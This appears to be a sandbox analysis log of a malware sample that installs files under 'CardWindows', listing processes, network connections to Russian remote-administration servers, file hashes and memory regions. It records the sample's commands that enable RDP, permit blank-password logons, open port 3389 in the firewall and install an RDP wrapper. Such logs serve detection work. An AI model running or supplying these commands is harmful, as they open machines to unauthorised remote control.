"C:\Program Files\CardWindows\\MSIDrvs.exe" /firewall

C:\Program Files\CardWindows\MSIDrvs.exe

"C:\Program Files\CardWindows\\MSIDrvs.exe" /start

C:\Program Files\CardWindows\MSIDrvs.exe

"C:\Program Files\CardWindows\MSIDrvs.exe"

C:\Program Files\CardWindows\SystemDrvs.exe

"C:\Program Files\CardWindows\SystemDrvs.exe"

C:\Program Files\CardWindows\SystemDrvs.exe

"C:\Program Files\CardWindows\SystemDrvs.exe" /tray

C:\Program Files\CardWindows\sys.exe

"C:\Program Files\CardWindows\\sys.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Windows/run.bat

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v limitblankpassworduse /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow

C:\Program Files\CardWindows\SystemDrvs.exe

"C:\Program Files\CardWindows\SystemDrvs.exe" /tray

C:\Windows\system32\MusNotifyIcon.exe

%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13

C:\Windows\RDPWInst.exe

"RDPWInst.exe" -i -o

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

Network

Country  Destination          Domain                              Proto
US       209.197.3.8:80                                           tcp
US       72.21.91.29:80                                           tcp
US       8.8.8.8:53           rmansys.ru                          udp
RU       31.31.198.18:80      rmansys.ru                          tcp
RU       31.31.198.18:80      rmansys.ru                          tcp
US       8.8.8.8:53           rms-server.tektonit.ru              udp
RU       95.213.205.83:5655   rms-server.tektonit.ru              tcp
US       8.8.8.8:53           geo.prod.do.dsp.mp.microsoft.com    udp
US       52.184.216.226:443   geo.prod.do.dsp.mp.microsoft.com    tcp
US       8.8.8.8:53           kv801.prod.do.dsp.mp.microsoft.com  udp
NL       184.29.205.60:443    kv801.prod.do.dsp.mp.microsoft.com  tcp
US       8.8.8.8:53           cp801.prod.do.dsp.mp.microsoft.com  udp
NL       184.29.205.60:443    cp801.prod.do.dsp.mp.microsoft.com  tcp
NL       184.29.205.60:443    cp801.prod.do.dsp.mp.microsoft.com  tcp

Files

C:\Program Files\CardWindows\regedit.reg

MD5 06c5938fae635bb8ce25794b720d792b
SHA1 bedbcddd59e5648543b53d0d66b643a2d26cb262
SHA256 bfd56a7929f620d054ae39a4815632934af9ce91810190ecc02c0381e61bdd5f
SHA512 befab3eddba41837c4e16000580e159934829a99827b03e382bea6a01cd5503a3f8b82746c0e9902b760dc8ab308dfa19fd7e8503d631acead4c9454c728d9fa

C:\Program Files\CardWindows\MSIDrvs.exe

MD5 fcc39072590b72de6f9c8e0559155fd6
SHA1 1ff3ac690d6ff39639699d373314291b4a797393
SHA256 74974af03632e5770fbb5e68bae28d71398ba32b018b35fb9e5c85788fa1008c
SHA512 1bfcb20ee8b11e08e4865162050379d220e647dddef811b93945fe7b47939de000e104ff3365b737fcee8752a08d04ba7130e94e2ec6e576442eb4b758ad047f

C:\Program Files\CardWindows\MSIDrvs.exe

MD5 fcc39072590b72de6f9c8e0559155fd6
SHA1 1ff3ac690d6ff39639699d373314291b4a797393
SHA256 74974af03632e5770fbb5e68bae28d71398ba32b018b35fb9e5c85788fa1008c
SHA512 1bfcb20ee8b11e08e4865162050379d220e647dddef811b93945fe7b47939de000e104ff3365b737fcee8752a08d04ba7130e94e2ec6e576442eb4b758ad047f

memory/1872-133-0x00000000010B0000-0x00000000010B1000-memory.dmp

C:\Program Files\CardWindows\MSIDrvs.exe

MD5 fcc39072590b72de6f9c8e0559155fd6
SHA1 1ff3ac690d6ff39639699d373314291b4a797393
SHA256 74974af03632e5770fbb5e68bae28d71398ba32b018b35fb9e5c85788fa1008c
SHA512 1bfcb20ee8b11e08e4865162050379d220e647dddef811b93945fe7b47939de000e104ff3365b737fcee8752a08d04ba7130e94e2ec6e576442eb4b758ad047f

memory/1488-135-0x0000000002A90000-0x0000000002A91000-memory.dmp

C:\Program Files\CardWindows\MSIDrvs.exe

MD5 fcc39072590b72de6f9c8e0559155fd6
SHA1 1ff3ac690d6ff39639699d373314291b4a797393
SHA256 74974af03632e5770fbb5e68bae28d71398ba32b018b35fb9e5c85788fa1008c
SHA512 1bfcb20ee8b11e08e4865162050379d220e647dddef811b93945fe7b47939de000e104ff3365b737fcee8752a08d04ba7130e94e2ec6e576442eb4b758ad047f

C:\Program Files\CardWindows\MSIDrvs.exe

MD5 fcc39072590b72de6f9c8e0559155fd6
SHA1 1ff3ac690d6ff39639699d373314291b4a797393
SHA256 74974af03632e5770fbb5e68bae28d71398ba32b018b35fb9e5c85788fa1008c
SHA512 1bfcb20ee8b11e08e4865162050379d220e647dddef811b93945fe7b47939de000e104ff3365b737fcee8752a08d04ba7130e94e2ec6e576442eb4b758ad047f

memory/2980-138-0x0000000002950000-0x0000000002951000-memory.dmp

memory/1916-139-0x0000000000B80000-0x0000000000B81000-memory.dmp

C:\Program Files\CardWindows\vp8decoder.dll

MD5 d43fa82fab5337ce20ad14650085c5d9
SHA1 678aa092075ff65b6815ffc2d8fdc23af8425981
SHA256 c022958429edd94bfe31f2eacfe24ff6b45d6f12747725c449a36116373de03b
SHA512 103e61a9f58df03316676a074487e50ec518479c11068df3736df139b85c7671048c65bce0ef2c55b3c50c61fde54e9e6c7d1b795aea71263ae94c91d4874e0d

C:\Program Files\CardWindows\SystemDrvs.exe

MD5 0bc376498b56d88341bd711ad4b823d2
SHA1 d96d9566628786bd40768949ec6f9b67ade357eb
SHA256 8929fa37860921d1f43eec6192876e6e6daf82d2013aeb08e0285ac5456fd52a
SHA512 64b5f671afe8186adf7930bafce7ccb4c3378a47ceb330aa0dfe36e34cfc6bcba8742497f721395292185864541d618affe6040961f90c5b663c914c93f33656

C:\Program Files\CardWindows\vp8encoder.dll

MD5 dab4646806dfca6d0e0b4d80fa9209d6
SHA1 8244dfe22ec2090eee89dad103e6b2002059d16a
SHA256 cb6ef96d3a66ef08ec2c8640b751a52d6d4f4530cf01162a69966f0fd5153587
SHA512 aa5eb93bf23a10de797d6fb52a55a95d36bc48927c76fedd81e0c48872745cb7f7d1b3f230eaae42fd4e79b6a59ca707e56bd6963b03644cbd5984f11e98d6e7

C:\Program Files\CardWindows\SystemDrvs.exe

MD5 0bc376498b56d88341bd711ad4b823d2
SHA1 d96d9566628786bd40768949ec6f9b67ade357eb
SHA256 8929fa37860921d1f43eec6192876e6e6daf82d2013aeb08e0285ac5456fd52a
SHA512 64b5f671afe8186adf7930bafce7ccb4c3378a47ceb330aa0dfe36e34cfc6bcba8742497f721395292185864541d618affe6040961f90c5b663c914c93f33656

C:\Program Files\CardWindows\SystemDrvs.exe

MD5 0bc376498b56d88341bd711ad4b823d2
SHA1 d96d9566628786bd40768949ec6f9b67ade357eb
SHA256 8929fa37860921d1f43eec6192876e6e6daf82d2013aeb08e0285ac5456fd52a
SHA512 64b5f671afe8186adf7930bafce7ccb4c3378a47ceb330aa0dfe36e34cfc6bcba8742497f721395292185864541d618affe6040961f90c5b663c914c93f33656

memory/3352-145-0x0000000000BB0000-0x0000000000BB1000-memory.dmp

memory/2584-146-0x00000000029A0000-0x00000000029A1000-memory.dmp

C:\Program Files\CardWindows\sys.exe

MD5 faf1fc3b0b4e42ab038677f1168fbf17
SHA1 5e04f80934853f0552079c27b7d2fd6e62dd1b3c
SHA256 a262cec7448e5db073fc858f5f7e6c871460e8853a12a34f96d3cce95eebf109
SHA512 74f2dd08e0f3c1d9b44c104abae62b31d1d49c4e1e7e5a15b11154dd1cae10280adb93e202a62e7772d617d5d3154e1a61bb11a9e929fb2610a6ed8a0a7f80e2

C:\Program Files\CardWindows\sys.exe

MD5 faf1fc3b0b4e42ab038677f1168fbf17
SHA1 5e04f80934853f0552079c27b7d2fd6e62dd1b3c
SHA256 a262cec7448e5db073fc858f5f7e6c871460e8853a12a34f96d3cce95eebf109
SHA512 74f2dd08e0f3c1d9b44c104abae62b31d1d49c4e1e7e5a15b11154dd1cae10280adb93e202a62e7772d617d5d3154e1a61bb11a9e929fb2610a6ed8a0a7f80e2

memory/1708-149-0x0000000000400000-0x00000000009B7003-memory.dmp

memory/1708-150-0x0000000000400000-0x00000000009B7003-memory.dmp

memory/1708-153-0x0000000000401000-0x0000000000797000-memory.dmp

memory/1708-154-0x0000000002710000-0x0000000002713000-memory.dmp

memory/1708-155-0x0000000000DC0000-0x0000000000DC6000-memory.dmp

memory/1708-156-0x00000000026C0000-0x000000000270B000-memory.dmp

C:\Windows\run.bat

MD5 93a098e3701bf40042a0e51d3a125b31
SHA1 2dcbf75b8d8bba7830aa363c1e56560e552c726a
SHA256 8a0c16ab6f2b5af74b62fe041b8bc1ddf8dc03fb713c5bb30beceba307bb1269
SHA512 06d97a68fc971bc5c739f5da10a172c2279b9158b994d78b7eb60fff6e484c118b70631df788557a213f26baae00cde9ed7e176b1495c5d2ec74099a7fa3fa12

memory/1708-158-0x000000007FE40000-0x000000007FE41000-memory.dmp

C:\Program Files\CardWindows\SystemDrvs.exe

MD5 0bc376498b56d88341bd711ad4b823d2
SHA1 d96d9566628786bd40768949ec6f9b67ade357eb
SHA256 8929fa37860921d1f43eec6192876e6e6daf82d2013aeb08e0285ac5456fd52a
SHA512 64b5f671afe8186adf7930bafce7ccb4c3378a47ceb330aa0dfe36e34cfc6bcba8742497f721395292185864541d618affe6040961f90c5b663c914c93f33656

memory/1628-160-0x0000000000E80000-0x0000000000E81000-memory.dmp

C:\Windows\RDPWInst.exe

MD5 9c257b1d15817a818a675749f0429130
SHA1 234d14da613c1420ea17de60ab8c3621d1599f6f
SHA256 b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c
SHA512 b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521

C:\Windows\RDPWInst.exe

MD5 9c257b1d15817a818a675749f0429130
SHA1 234d14da613c1420ea17de60ab8c3621d1599f6f
SHA256 b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c
SHA512 b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521